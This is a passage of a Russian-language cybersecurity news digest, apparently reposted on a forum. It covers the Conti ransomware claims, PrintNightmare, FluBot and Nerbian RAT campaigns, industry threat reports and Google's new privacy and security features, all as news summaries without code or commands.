Он не стал комментировать, кто стоит за нападением, но сказал, что доверяет нашим экспертам.

«Я думаю, что эта хакерская атака была выбрана как время, чтобы вызвать максимальное напряжение в обществе — прямо рядом с пасхальными выплатами, в одной из самых уязвимых групп — пенсионерах. До меня дошло, что реакция от Почты Болгарии могла быть и лучше, но в итоге получилась некоторая задержка», — сказал Феофанидис.

По словам Богдана Теофанидиса, компания уже много лет недофинансируется. В период с 2011 по 2020 год правительство оплачивало универсальную почтовую услугу с двухлетней задержкой. Только с начала 2020 года будет запущен механизм предоплаты на почту. Однако все причитающееся до сих пор перенесено к выплате на 5 лет — до 2025 года.

План восстановления предусматривает 10 миллионов левов на основную цифровизацию болгарских почт — ремонт станций, энергоэффективность, оборудование, серверные системы, новое программное обеспечение, резюмировал исполнительный директор.

Злоумышленники говорят о краже 9,41 ГБ секретных данных.
image



Conti добавила Главное управление разведки Перу (DIGIMIN) в список своих жертв на сайте Tor. Хакеры заявили о краже 9,41 ГБ секретных данных. Агентство отвечает за национальную, военную и полицейскую разведку, а также за контрразведку. На данный момент сайт перуанского DIGIMIN недоступен.

304b111e1b097936a84e2ee04a169daf.png


Скриншот с сайта Conti.



Подобная атака на разведывательное агентство может привести к раскрытию секретных документов и создать риск для национальной безопасности. На прошлой неделе Госдепартамент США предложил до 15 миллионов долларов за информацию о группе вымогателей Conti . Награда предлагается в рамках программы Госдепартамента США по вознаграждению за борьбу с транснациональной организованной преступностью (TOCRP).

Власти предлагают до 10 миллионов долларов за информацию, которая позволит установить личность или местонахождение кого-либо из лиц, являющихся руководителями Conti, а еще 5 миллионов долларов предлагаются за сведения, которые приведут к аресту любого лица в любой стране, если оно связано с группировкой.

Ранее мы писали про награду за информацию о Conti, а также о их методах переговоров с жертвами. Рекомендуем ознакомиться с этими материалами.

Программистам из NiceHash удалось снять блокировку на видеокартах Nvidia GeForce RTX 30 LHR
image



Специалисты майнинговой площадки NiceHash сообщили , что им удалось полностью разблокировать ограничения LHR с карт NVIDIA RTX 30 Lite, благодаря новейшему программному обеспечению QuickMiner v0.5.4.0 RC (Excavator v1.7.7.0).

Как сообщается, теперь при использовании майнеров NiceHash QuickMiner или NiceHash Miner будет достигаться 100-процентная эффективность любых 3D-карт Nvidia с защитой LHR – от RTX 3060 до RTX 3080 Ti.

Специалисты NiceHash протестировали GeForce RTX 3080 Ti, и она выдала 120 MH/s при добыче Ethereum, продемонстрировав 100%-ную эффективность. Примерно на том же уровне Ethereum добывает GeForce RTX 3090 – единственная 3D-карта Nvidia серии RTX 30, на которую защита LHR не распространяется.

Стоит отметить, что команда разработчиков NiceHash одной из первых частично разблокировала производительность LHR-видеокарт NVIDIA в майнинге, повысив их эффективность до 70 % от потенциально возможной. Соответствующее программное обеспечение вышло в августе прошлого года. А теперь, спустя 9 месяцев они научились обходить блокировку полностью.
 
Как конфликт между РФ и Украиной может повлиять на киберландшафт – 5 возможных сценариев

Эксперты изучили двигатели российско-украинского конфликта с целью спрогнозировать его возможное влияние на киберпространство.

Специалисты ИБ-компании EclecticIQ изучили различные двигатели российско-украинского конфликта с целью выявить и описать его возможное влияние на киберпространство и технологии. Аналитики не могут предугадать исход сложившейся ситуации, но, вероятнее всего, она изменит то, как страны по всему миру будут принимать решения по использованию кибервозможностей и технологий в дипломатических и вооруженных конфликтах.

Специалисты EclecticIQ описали пять возможных сценариев, которые начнут или продолжат развиваться по мере продолжения специальной военной операции. Эти сценарии охватывают диапазон вероятностей, начиная с уже реализуемой концепции и заканчивая правдоподобным долгосрочным изменением киберстратегии России.

Сценарий №1: Россия усилит использование технологий для поддержания своей доктрины за рубежом

Данный сценарий предполагает, что российские сообщения внешней (международной) аудитории станут более направленными и сеющими рознь. Для этого Россия может удвоить число сообщений в СМИ и соцсетях и усилить свои кибервозможности по созданию по-настоящему убедительных фейковых новостей, которые будут циркулировать преимущественно в соцсетях. Эти фейковые новости будут настолько правдоподобными и таргетированными, что получившая их аудитория не сможет (или поленится) проверять их подлинность. Те, кто не получит эти новости, не смогут поверить в то, что кто-то вообще способен верить подобным ложным сообщениям.

Вероятнее всего, Москва будет отправлять сообщения украинским военным и гражданскому населению о бесполезности дальнейшего сопротивления и неизбежности победы России.

Москва может попытаться опровергать противоположные нарративы с помощью фермы троллей, публикующих нужную ей информацию и заглушающих ненужную. Она также может осуществлять кибератаки на СМИ и платформы, использующиеся для распространения новостей, с целью получения информационного преимущества, а также запугивать СМИ, заставляя их отказываться от изображения Москвы в негативном свете, и блокировать доступ к определенным новостным источникам. Если Москва сочтет необходимым исключить возможность получения населением новостей из внешнего мира, она может заблокировать доступ к VPN-провайдерам или полностью отключить доступ к интернету.

Сценарий №2: Целенаправленные кибератаки на западные страны с целью посеять неуверенность

Если Москва почувствует, что ее международная изоляция начинает чрезмерно обращаться против нее, она может осуществлять целенаправленные кибератаки, чтобы таким образом транслировать свое сообщение другим странам. Сообщения могут различаться по интенсивности и быть направлены на разные цели, но каждое из них будет иметь определенную цель. Некоторые атаки могут быть направлены на то, чтобы подорвать уверенность граждан в способности их правительства обеспечить целостность основных услуг или противостоять агрессивным кибератакам из-за рубежа. Другие (например, атаки на критическую инфраструктуру) могут быть более опасными и транслировать сообщение о том, что вытеснение России из международной сферы будет иметь серьезные последствия для западных стран.

Применяющиеся в данном сценарии тактики вероятнее всего будут использоваться в тандеме с другими описанными здесь сценариями, в особенности с представленным выше, предполагающим усиленное обращение к технологиям для распространения пропаганды.

Сценарий №3: Раскол киберпреступных платформ и форумов, ранее ориентированных на получение финансовой выгоды

До сих пор большинство киберпреступных форумов преследовали исключительно материальную выгоду и были вне политики, но в связи с конфликтом между Россией и Украиной все может измениться. Киберпреступные форумы начнут расти, раскалываться или образовываться намного быстрее, что приведет к формированию новых группировок, отображающих определенные политические или социальные интересы. Ориентированные на получение финансовой выгоды сайты по-прежнему будут существовать, но к ним также присоединятся новые, которые будут отстаивать определенную точку зрения.

Сценарий №4: Технологическим компаниям придется быстро адаптироваться к тому, что их продукты будут использоваться новыми, непредусмотренными способами

Использование соцсетей и других кибер- и технологических инструментов в российско-украинском конфликте побудит технологические компании изучить и изменить то, как их инструменты используются, управляются и воспринимаются разработчиками и пользователями.

Данный конфликт является еще одним примером того, как технические инструменты могут быть полезными или вредными в напряженных ситуациях. В последние месяцы технологии, в частности соцсети, не раз подвергались критике за их роль в распространении дезинформации, сознательном усилении разжигающей конфликт риторики и пагубное воздействие на молодежь.

С другой стороны, во время войны технические средства служат ценными каналами связи для жертв, новостных агентств и свидетелей конфликта, которым необходимо общаться друг с другом и с внешним миром. Они предлагают новые способы общения и сбора средств. Однако эти же технические средства могут использоваться враждебными или репрессивными правительствами для распространения дезинформации и контроля над населением.

Сценарий №5: Россия может обратиться к киберпреступному сообществу для восполнения нехватки денег

Поскольку Россия может оказаться отрезанной от мирового финансового рынка, не исключено, что она обратиться к киберпреступным организациям для пополнения государственной казны (как это делает КНДР).

Данный сценарий предполагает, что Москва будет более открыто руководить действиями российских киберпреступных группировок. Имея преступную группу, выступающую в качестве доверенного лица, Москва сможет оказывать давление на киберпреступников, вынуждая их проводить свои операции под руководством правительства и передавать ему свою прибыль. Правительство также может переключить внимание государственных киберресурсов со шпионажа на тайные кибероперации. Получение выкупа любыми средствами станет приоритетной задачей.




 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Технологический сектор подвергся наиболее серьезной утечке идентификационных данных
image



SpyCloud опубликовал ежегодный анализ утечки личных данных сотрудников компаний из списка Fortune 1000 в секторах технологий, финансов, розничной торговле и телекоммуникаций.

Опираясь на базу из более чем 200 млрд. украденных данных, исследователи выявили более 687 млн. открытых учетных и личных данных сотрудников компаний из списка Fortune 1000, что на 26% больше прошлогоднего анализа.

64% пользователей использовали повторяющиеся легко угадываемые пароли и стали жертвами вредоносных атак на устройства. Несоблюдение правил защиты является источником риска кибербезопасности для работодателя и потребителя, полагающегося на компанию в защите своих персональных данных. Удаленная работа объединяет работу с использованием персональных устройств и увеличивает риск распространения кибератак за пределы скомпрометированных данных сотрудников и потребителей для проникновения в корпоративные сети.

«За последние два года возможности атак большинства компаний расширились из-за новой реальности удаленной работы», - сказал директор по продуктам SpyCloud Дэвид Эндлер.

«В сочетании с рядом угроз со стороны злоумышленников и состоянием мировых дел компаниям из списка Fortune 1000 срочно необходимо усилить все векторы угроз, начиная с выявления и исправления скомпрометированных учетных данных сотрудников и зараженных устройств», - добавил Эндлер.

Исследователи идентифицировали учетные данные, персональную информацию (Personally Identifiable Information, PII) и данные зараженных устройств 70 000 сотрудников Fortune 1000 в перехваченных журналах ботнета с информацией, перекачанной с помощью вредоносного ПО infostealer. Сотрудник, работающий с зараженного устройства, создает риск для предприятия даже при использовании сложных парольных фраз и многофакторной аутентификации (Multi-Factor Authentication, MFA).

Уязвимости высокой степени серьезности предоставляют преступнику все необходимые данные для обхода аутентификации и выдачи себя за сотрудника с помощью паролей, системной информации, отпечатков браузера и cookie файлов. Почти 29 млн. зараженных устройств использовались для входа на клиентские сайты компаний и предоставляли мошенникам учетные данные и PII пользователей.

«Вредоносная программа на персональном устройстве является самым опасным источником заражения из-за трудного обнаружения и способности увеличить площадь атаки программ-вымогателей», - сказал Эндлер. «Кибератаки могут не только привести к катастрофическим последствиям для прибыли компании, но также могут существенно повлиять на критически важную инфраструктуру».

Компании критической инфраструктуры больше всех нарушали правила кибергигиены. В аэрокосмической, оборонной, химической, промышленной и энергетической отраслях было обнаружено использование названий компаний в первых трех-пяти наиболее часто используемых паролях.

Технологический сектор подвергся наиболее серьезной утечке идентификационных данных: более 26 млн. записей о взломах представляют собой 139 млн. активов сотрудников (учетные данные, PII, cookie файлы и т.д.) и составляют 21% всех компаний Fortune 1000 (затем следуют финансовые услуги с 21 млн. записей и почти 120 млн. активов).

Технологические компании также имели наибольшее количество зараженных устройств: около 70% всех зараженных потребительских устройств из Fortune 1000 (20,6 млн.), и около 50% всех зараженных устройств сотрудников (примерно 34 000).

Для защиты от вредоносных кибератак компании из списка Fortune 1000 не должны надеяться исключительно на своих сотрудников. Организациям следует внимательно следить за поведением потребителей во избежание увеличения кибератак.

Для минимизации утечек личных данных и паролей предприятиям необходимо:
  • применить строгую корпоративную политику паролей с помощью единого входа; создать четкую политику в отношении использования бизнес- и персональных устройств;
  • применить многофакторную аутентификацию для критически важных учетных записей;
  • обязать сотрудников использовать менеджер паролей;
  • провести непрерывную оперативную аналитику своих пользователей, особенно в отраслях с большим количеством конфиденциальных клиентских данных, таких как технологии, электронная коммерция и финансовые услуги.

За последние 12 месяцев число фишинговых загрузок резко возросло на 450%
image


За последние 12 месяцев число фишинговых загрузок резко возросло на 450%

Компания Netskope опубликовала результаты исследования, согласно которым за последние 12 месяцев число фишинговых загрузок резко возросло на 450%. Причиной такого роста стало использование злоумышленниками методов поисковой оптимизации (SEO) для повышения позиций вредоносных PDF-файлов в популярных поисковых системах, таких как Google и Bing.

d1bd9a9bce4e6b22ea395ece481c9d56.png

Статистика источников загрузок вредоносного ПО от Netscope
По традиции, в списке самых популярных способов распространения вредоносного ПО присутствует категория вредоносов, попадающих к пользователям через бесплатные и условно бесплатные программы, однако доминирующие позиции заняли "новички".

Рост использования поисковых систем для распространения вредоносного ПО за последние 12 месяцев ясно дает понять, насколько умелыми стали некоторые злоумышленники в области SEO. Большая часть вредоносов, загружаемых с поисковых систем – опасные PDF-файлы. Еще стоит отметить множество поддельных CAPTCHA, перенаправляющих пользователей на фишинговые, спамерские, мошеннические и вредоносные веб-сайты.

Результаты исследования показывают новую тенденцию среди злоумышленников. Хакеры совершают кибератаки, размещая вредоносное ПО в регионах жертв, тем самым избегая системы геозонирования. Тенденция особенно хорошо видна на примере Северной Америки, где 84% всех вредоносных программ были загружены с североамериканских веб-сайтов жертвами из Северной Америки.

"Вредоносные программы больше не прикованы к категории опасных веб-сайтов. Теперь они скрываются повсюду: от облачных приложений до поисковых систем, подвергая организации еще большему риску, чем когда-либо прежде", – сказал Рэй Канзанезе, директор Netskope Threat Labs. "Чтобы не стать жертвами методов социальной инженерии и направленных атак, руководители служб безопасности должны регулярно обновлять стратегии защиты от вредоносного ПО и вести наблюдение за всеми возможными точками входа".

В качестве дополнения к исследованию Netscope опубликовала интересную статистику:
  • Трояны продолжают демонстрировать свою эффективность: На долю троянских программ приходится 78% всех загрузок вредоносного ПО из облачных и веб-интерфейсов.
  • Облако и Интернет – идеальная комбинация для злоумышленников: 47% загрузок вредоносного ПО происходит из облачных приложений, а оставшиеся 53% приходятся на традиционные веб-сайты, поскольку злоумышленники продолжают использовать сочетание из облачных и веб-приложений для атак на своих жертв.
  • Популярные приложения для облачного хранения данных по-прежнему являются источником большинства загрузок вредоносного ПО из облака.
  • Количество вредоносных программ для Microsoft Office значительно снизилось. Специалисты объясняют это новыми средствами контроля безопасности, выпускаемыми Google и Microsoft.

Если пользователь недавно использовал диспетчер очереди печати Windows, он может стать жертвой взлома.
image



Если пользователь недавно использовал диспетчер очереди печати Windows, он может стать жертвой взлома.

Согласно новому отчету компании Kaspersky , в период с июля 2021 по апрель 2022 года киберпреступники провели около 65 000 атак с помощью приложения Windows Print Spooler . Кроме того, 31 000 нападений была совершена в первой половине 2022 года. Диспетчер очереди печати используется для управления процессом печати и из-за многочисленных уязвимостей стал целью киберпреступников.

Уязвимости CVE-2021-1675 и CVE-2021-34527 (также известные как PrintNightmare ) были обнаружены из необычного источника, поскольку они были ошибочно опубликованы в качестве доказательства концепции (Proof of concept, PoC) на GitHub для выявления уязвимостей приложения. Пользователи обнаружили ряд серьезных пробелов в приложении. По словам Kaspersky, в прошлом месяце была обнаружена еще одна критическая уязвимость, вызвавшая атаки с помощью получения доступа киберпреступником к корпоративным ресурсам.

После выявления ошибок Microsoft выпустила исправление для остановки атак с PrintNightmare и недавно обнаруженным эксплойтом, но некоторые жертвы атаки не смогли загрузить и внедрить исправление.

«Уязвимости Windows Print Spooler являются распространителями возникающих новых угроз», - сказал исследователь безопасности Kaspersky Алексей Кулаев.

«Мы ожидаем растущего числа попыток получения доступа к ресурсам в корпоративных сетях, сопровождающихся высоким риском заражения вредоносным ПО и кражи данных. С помощью некоторых из этих уязвимостей злоумышленник может получить доступ не только к данным жертв, но и ко всему корпоративному серверу. Поэтому пользователям настоятельно рекомендуется следовать рекомендациям корпорации Microsoft и применять последние обновления для системы безопасности Windows», - добавил Кулаев.

С июля 2021 по апрель 2022 года почти четверть обнаруженных обращений поступила из Италии. Также наиболее активно были атакованы пользователи в Турции и Южной Корее, а за последние четыре месяца атакам были подвержены пользователи в Австрии, Франции и Словении.

Для защиты системы Kaspersky рекомендует пользователям несколько мер безопасности:
  • Часто устанавливать исправления для новых уязвимостей по мере их появления;
  • Проводить регулярный аудит безопасности IT-инфраструктуры организации;
  • Использовать решения для защиты конечных точек и почтовых серверов с возможностями защиты от фишинга;
  • Использовать специальные сервисы для борьбы с крупными атаками;
  • Установить Anti-APT (Advanced Persistent Threat) решения и EDR (Endpoint Detection and Response) для обнаружения и предотвращения угроз
По словам Kaspersky, наилучшим решением является проверка исправлений всех системных уязвимостей. Также необходимо всегда иметь актуальную систему безопасности конечных точек и использовать модель нулевого доверия Zero Trust .

Бесплатный инструмент поможет организациям с выявлением уязвимостей.
image



Национальный центр кибербезопасности Великобритании (NCSC) объявил о запуске нового сервиса для проверки безопасности электронной почты. Email Security Check (ESC) – бесплатный онлайн-инструмент, не требующий ввода личных данных и регистрации. Инструмент должен помочь организациям выявить уязвимости, которые позволяют злоумышленникам подделывать электронные письма или приводят к нарушению конфиденциальности электронной почты. ESC позволяет специалистам просматривать публичную информацию о почтовых доменах и проверять их на наличие антиспуфинга и рисков для безопасности электронной почты.

"Сервис проверяет, правильно ли настроены стандарты защиты от спуфинга по типу DMARC, чтобы помочь организациям предотвратить использование корпоративных доменов злоумышленниками и остановить рассылку вредоносных писем", – заявили в NCSC. "Инструмент также проверяет наличие протоколов конфиденциальности для обеспечения шифрования электронных писем".

Хотя ESC способен найти только те уязвимости, которые могут обнаружить киберпреступники, ее цель – помочь организациям выявить их до атаки на домен электронной почты компании. Организации, соответствующие требованиям безопасности, могут получить доступ к "углубленному руководству" по защите своей электронной почты, подписавшись на бесплатную услугу NCSC Mail Check .

"Наш новый инструмент проверки безопасности электронной почты помогает пользователям определить, где они могут сделать больше для предотвращения спуфинга и защиты конфиденциальности, а также предлагает практические советы по безопасности", – сказал Пол Мэддинсон, директор NCSC по национальной устойчивости и стратегии. "Выполняя рекомендуемые действия, организации могут укрепить свою защиту, продемонстрировать серьезное отношение к безопасности и усложнить жизнь киберпреступникам".

Сейчас ESC доступен только организациям из центрального правительства, местным органам власти, децентрализованным администрациям, аварийным службам, организациям NHS, научным и благотворительным организациям.

Финляндия стала жертвой новой SMS-кампании вредоноса FluBot.
image



Национальный центр кибербезопасности Финляндии (NCSC-FI) предупредил о новой вредоносной кампании, которая использует SMS и MMS для распространения вредоносного ПО FluBot. Вредоносное ПО крадет учетные данные финансовых счетов своих жертв, накладывая фишинговые страницы поверх законных банковских и криптовалютных приложений. Кроме того, FluBot может получать доступ к SMS-данным, совершать телефонные звонки и отслеживать входящие уведомления, похищая временные коды аутентификации, необходимые для входа в систему.

Финские власти выпустили аналогичное предупреждение в прошлом году после обнаружения 70 000 вредоносных сообщений всего за 24 часа. На этот раз конкретные цифры не указаны, но NCSC-FI заявила о распространении тысяч вредоносных сообщений среди потенциальных жертв.

Операторы FluBot используют SMS-сообщения, содержащие ссылки на голосовую почту, уведомления о пропущенных звонках или фальшивые предупреждения о денежном переводе.

e66e6d42145f91be446900db317a3c15.png


Образцы SMS-сообщений FluBot, замеченные в Финляндии (NCSC-FI)

Ссылки в этих сообщениях ведут на сайт с APK-файлом FluBot, который жертвам предлагается скачать и установить, чтобы узнать больше о пропущенных звонках, денежном переводе или прослушать голосовое сообщение

7eecbef6d53235077e7fffca8603534b.png


Мошенническое голосовое сообщение, призывающее пользователя загрузить приложение FluBot (NCSC-FI)

Приложение просит Android-пользователя предоставить опасные разрешения: доступ к SMS-данным, управление телефонными звонками и чтение контактов. Злоумышленники используют список контактов для второй волны SMS-рассылки с зараженных устройств. Поскольку сообщения приходят с номеров друзей и знакомых, другие пользователи с большей вероятностью откроют их и заразят свои устройства.

Если вредоносное SMS достигает пользователя iPhone, мошенники не теряют возможность заработать, перенаправляя жертву на фальшивые премиум-подписки и прочие сомнительные предложения.

По словам NCSC-FI, вредоносное ПО не установится на устройство жертвы после открытия ссылки, однако пользователям рекомендуется не устанавливать APK-файлы из неофициальных источников.

Мы писали о прошлогоднем аресте операторов FluBot правительством Испании. Тогда каталонская полиция арестовала четверых мужчин в возрасте 19-27 лет, подозреваемых в распространении вредоносного ПО FluBot.

Исследователи выявили 14 немецких предприятий, ставших жертвами данной кампании.
image



Специалисты ИБ-компании Check Point рассказали о фишинговой кампании, направленной против немецких автопроизводителей и автодилеров. Кампания началась примерно в июле прошлого года и активна до сих пор.

Злоумышленники зарегистрировали множество поддельных доменов, похожих на настоящие сайты легитимных организаций, и используют их для рассылки фишинговых писем, содержащих вредоносное ПО для похищения данных.

Цепочка заражения начинается с отправки жертве фишингового письма с ISO-файлом образа диска, обходящим многие внутренние механизмы безопасности. Письма, отправляемые автодилерам, могут содержать, например, поддельные квитанции о передаче автомобиля.

Пока жертва просматривает поддельный документ, открытый файлом HTA, в фоновом режиме выполняется код, извлекающий и запускающий вредоносное ПО.

Специалисты обнаружили несколько версий таких скриптов. Одни из них запускают PowerShell-код, другие являются обфусцированными, а третьи представлены в текстовом виде. Все они загружают и выполняют различные инфостилеры, распространяющиеся в хакерском сообществе по бизнес-модели «вредоносное ПО как услуга» (Malware as a Service, MaaS).

В частности, используются такие MaaS-инфостилеры, как Raccoon Stealer, AZORult и BitRAT, которые можно купить в даркнете и на хакерских форумах.

Исследователи выявили 14 немецких предприятий, ставших жертвами данной кампании, но названия их не сообщили.

По словам экспертов, за атаками могут стоять киберпреступники из Ирана, но у них нет достаточно доказательств для того, чтобы утверждать это со стопроцентной уверенностью.

Целью кампании предположительно являются промышленный шпионаж или мошенничество с корпоративной электронной почтой (BEC).
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Хакеры c разным уровнем квалификации стали чаще использовать компрометацию учетных записей.
image


Абсолютное большинство (77%) критических киберинцидентов в 1 квартале 2022 года было связано с атаками на онлайн-ресурсы российских организаций. При этом в 4 квартале предыдущего года критических веб-атак зафиксировано не было, выяснили эксперты компании «Ростелеком-Солар». Резкий всплеск подобных инцидентов начался с конца февраля. При этом целью хакеров был скорее не взлом веб-приложений для хищения ценных данных, а дестабилизация работы сайтов или дефейс.

В целом набор критических инцидентов по сравнению с последним кварталом 2021 года существенно изменился. В предыдущем периоде 78% из них было связано с сетевыми атаками (как правило, это сканирование внешнего периметра общедоступными средствами), а 14% – с заражением ВПО. В 1 квартале 2022 года на сетевые атаки пришлось уже 10%, а на заражение ВПО – только 3%.

«Обычно топ наиболее популярных типов атак объясняется дешевизной и простотой ряда техник, а также наличием типичных "слабых мест" на ИТ-периметрах компаний. Так, в 1 квартале 2022 года мы видим значительный рост критичности веб-атак. С одной стороны, хакеры активно применяли эту технику для того, чтобы посеять панику в обществе. С другой, компании пока нечасто уделяют внимание закрытию веб-уязвимостей, что делает онлайн-ресурсы одним из наиболее слабых мест в инфраструктурах», отметила Дарья Кошкина, руководитель направления аналитики киберугроз компании «Ростелеком-Солар».

Общее количество событий ИБ разной степени критичности в январе-марте 2022 года на 4% превысило показатель 4 квартала 2021 года. Примечательно, что за этот период выросло число массовых инцидентов, что указывает на рост активности со стороны низкоквалифицированных злоумышленников.

При этом хакеры c разным уровнем квалификации стали чаще использовать компрометацию учетных записей, что напрямую связано с попытками взлома инфраструктур атакуемых компаний. Количество подобных атак выросло за квартал на 9%.

Также на 11% увеличилось число случаев несанкционированного доступа к информационным системам и сервисам. В то же время за последние месяцы на теневом рынке выросло количество заказов на получение доступа к учетным данным различных компаний. Это может указывать на то, что ряд организаций не озаботились внутренней политикой безопасности на фоне обострения международной обстановки.

Злоумышленник нанес финансовый ущерб на сумму более 5 миллионов долларов США.
image


Минюст США предъявил Идрису Дайо Мустафе обвинения в совершении ряда киберпреступлений в период с 2011 по 2018 год, в результате которых был нанесен финансовый ущерб на сумму более 5 миллионов долларов США. Жертвами хакеров были американские финансовые учреждения и брокерские фирмы, пострадавшие от прямого взлома систем со стороны Мустафы и его сообщников, совершавших незаконные операции с использованием чужих брокерских счетов. В 2015 году злоумышленник имел наглость прилететь из Лондона в Нью-Йорк, чтобы открыть счет в Bank of America и использовать его для проведения незаконных торговых операций.

"Обвиняемый входил в состав гнусной хакерской группировки, причинившей потерпевшим убытки на миллионы долларов. Злоумышленники совершили целый ряд киберпреступлений, включая хакерские атаки, мошенничество, взлом брокерских счетов с ценными бумагами и торговлю от имени потерпевших", – заявил прокурор Бреон Мир.

Начиная с 2011 года, Мустафа и по крайней мере один литовский соучастник применяли различные мошеннические схемы, чтобы проникнуть на американские серверы электронной почты, которые поддерживали доступ клиентов к банковским и брокерским счетам. Хакеры похищали учетные данные учетных записей электронной почты, после чего использовали их для входа в финансовые платформы. Получив доступ к электронной почте, злоумышленники крали личную информацию, а затем узнавали все о контактах и ежедневных активностях жертвы.

Завладев нужной информацией, Мустафа использовал методы социальной инженерии против сотрудников финансовых учреждений, запрашивая электронные переводы на свои зарубежные банковские счета. К брокерским счетам хакер получал прямой доступ, после чего переводил деньги или ценные бумаги в другие фирмы и на новые счета.

Чтобы обойти наложенные блокировки, которые некоторые фирмы устанавливали в качестве меры борьбы с мошенничеством, хакер обманным путем использовал счета жертв для совершения незаконных сделок, от которых выигрывали его акции. Пытаясь заработать, злоумышленник часто ликвидировал существующие позиции по акциям, находящиеся на украденных брокерских счетах, занимался манипулированием рыночными ценами и т.д.

Хакер был арестован в Великобритании в августе 2021 года, теперь ему предъявлено десять обвинений, включая сетевое мошенничество, кражу личных данных при отягчающих обстоятельствах, мошенничество с ценными бумагами, мошенничество с устройствами доступа и т.д. Минимальное наказание по ним составляет два года и может достигать 20 лет тюремного заключения.
Сейчас Мустафа все еще находится в Великобритании, а США добиваются его выдачи.

Теперь функция доступна не только в диалогах, но и в беседах
image



В прошлом году Google добавила сквозное шифрование в RCS диалоги в приложении Messages. Недавно на презентации Google I/O корпорация объявила о доступности функции в групповых чатах.

В большинстве чатах между двумя пользователями сообщения может перехватить и прочитать третье лицо из-за отсутствия сквозного шифрования. Благодаря сквозному шифрованию даже Google не может видеть сообщения пользователей. По предположениям экспертов, шифрование будет работать аналогично диалогам 1 на 1. Все стороны должны использовать Google Messages и быть подключены к системе отправки сообщений через интернет (Rich Communication Services, RCS), а не к устаревшим службам SMS / MMS.

b86e17fe7ddb0fd9754a42c6fd8658b4.png

В чатах cо сквозным шифрованием отображается небольшой значок блокировки рядом с кнопкой отправки. На данный момент срок внедрения новой функции для групповых чатов не известен. У нас есть только обещание от Google включить шифрование в групповых чатах позже в этом году.

Ранее Google на презентации Google I/O представила смарт-очки с возможностью переводить разговор с одного языка на другой в реальном времени.

И скрыть реальные данные своей физической карты
image


Браузер Google Chrome теперь будет предлагать пользователю возможность использовать номер виртуальной кредитной карты в формах онлайн-платежей в Интернете. Виртуальная карта позволит сохранить в безопасности реальный номер кредитной карты при онлайн-покупках и в случае взлома систем продавца. Несколько эмитентов кредитных карт уже предлагают свои виртуальные номера, но такая услуга пока не имеет большого распространения.

98eaf1c038266093ac0dce8f08efdca3.png

По сообщениям Google, виртуальные карты появятся в продаже в США летом 2022 года. Функция будет запущена в партнерстве с компанией Capital One и другими крупными сетями и будет поддерживать платежные системы Visa и American Express, поддержка MasterCard появится позже в этом году. Наличие поддержки со стороны крупных сетей имеет большое значение, так как было бы сложно привлечь к участию каждого отдельного эмитента карт. Новая опция сначала будет доступна в Chrome на настольных компьютерах и Android, а поддержка iOS появится позже.

«Это важный шаг в обеспечении безопасности виртуальных карт как можно большему числу потребителей», - сказал вице-президент и генеральный менеджер Google по платежам Арнольд Голдберг.

«Покупатели, использующие Chrome на настольных компьютерах и Android, могут наслаждаться быстрым оформлением заказа при совершении покупок онлайн, сохраняя при этом спокойствие, зная, что их платежная информация защищена», - добавил Голдберг.

7dd435e86a9608107a491c9dc2a551a4.png

Новая функция автозаполнения введет данные виртуальной карты, включая CVV. Пользователь сможет управлять виртуальными картами и просматривать свои транзакции на pay.google.com . Несмотря на то, что виртуальные карты будут использоваться для одноразовых покупок, покупатель также сможет использовать эти карты и для подписок.

Возможно, некоторые пользователи будут беспокоиться об использовании Google покупательских привычек для таргетинга рекламы, но корпорация заявила, что не будет использовать данные о покупках в целях рекламы.

Новые механизмы обеспечат пользователям больше контроля над своими данными.
image



В среду, 11 мая, на своей ежегодной конференции для разработчиков Google I/O компания анонсировала ряд механизмов управления приватностью, которые предоставят пользователям больше контроля над использованием их данных приложениями от Google и отображением этих данных через поиск.

В частности, компания представила интерфейс My Ad Center – место, где пользователи смогут кастомизировать типы отображаемой им рекламы, выбирая интересные им темы и указывая неинтересные. В Google уверены, что My Ad Center обеспечит пользователям больше контроля не только над использованием их данных, но также над тем, как это использование влияет на их опыт в Сети.

Google также сообщила, что с помощью нового инструмента на странице профиля пользователи смогут запрашивать удаление из поисковой выдачи своей персональной информации, такой как электронные или физические адреса.

Одним из самых важных объявлений в области приватности стало объявление об изменении подхода к инженерии ПО. Старший вице-президент Google по ключевым системам Джен Фитцпатрик (Jen Fitzpatrick) представила концепцию «защищенных вычислений» – набора технологий, которые, по словам Google, представляют измененный подход к тому, как и где обрабатываются данные.

Если коротко, защищенные вычисления означают, что больше данных будут обрабатываться на устройствах (Android-смартфонах), а не на серверах Google. А большая часть пользовательской информации, отправляемой на серверы Google, будет анонимизированной с помощью таких техник, как дифференциальная приватность и граничные вычисления.

Помимо прочего, компания рассказала о нововведениях, призванных улучшить защиту пользователей всех ее продуктов. В частности, во всех приложениях Google в профиле пользователя появится новая иконка, отображающая статус безопасности, которая будет предупреждать о любых проблемах безопасности и направлять на инструкции по их решению.

Также компания расширит двухфакторную аутентификацию. Когда пользователь попытается войти в свою учетную запись Google в каком-либо другом месте в Сети, на его телефон придет запрос «Это вы?».

Среди других новых мер безопасности компания отметила защиту от фишинга в Google Workspace – приложения Docs, Sheets и Slides вскоре будут отображать предупреждения о вредоносных ссылках в документах.

Исследователи из Proofpoint бьют тревогу.
image



Специалисты из Proofpoint предупредили пользователей о появлении нового трояна удаленного доступа (RAT) под названием Nerbian. RAT написан на языке Go и нацелен на организации в Великобритании, Италии и Испании.

"Троян написан на языке программирования Go, не зависящем от ОС, скомпилирован для 64-битных систем и использует несколько процедур шифрования для обхода сетевого анализа", – пишут исследователи. RAT может регистрировать нажатия клавиш, запускать произвольные команды, делать скриншоты и передавать данные на удаленный C&C-сервер. Разработчик трояна пока неизвестен.

Nerbian распространяется с 26 апреля 2022 года через фишинговую рассылку с использованием поддельных писем на тему COVID-19. Количество таких писем не превышает 100, и они замаскированы под письма ВОЗ о мерах безопасности в условиях эпидемии. В письмах жертвам предлагается открыть документ Word с макросом, который в фоновом режиме запускает цепочку заражения.

Специалисты Proofpoint рассказали , что дроппером полезной нагрузки является UpdateUAV.exe – 64-битный исполняемый файл, размером 3,5 МБ и написанный на языке Golang. По данным исследователей, дроппер и вредоносное ПО были разработаны одним автором.

a1bbf3d4c62232bf7edc48347cdda819.png


Поддельное электронное письмо ВОЗ с Nerbian RAT внутри.​

Исследователи Proofpoint заметили в Nerbian множество антианалитических компонентов, усложняющих обратный инжиниринг и проведение антиреверсивных проверок. Защитные компоненты также используются для самоликвидации трояна при обнаружении отладчиков или программ анализа памяти.

Недавно мы писали про другой троян TeaBot, который триумфально прошел по планете, атаковав более 400 приложений и заразив миллионы устройств.

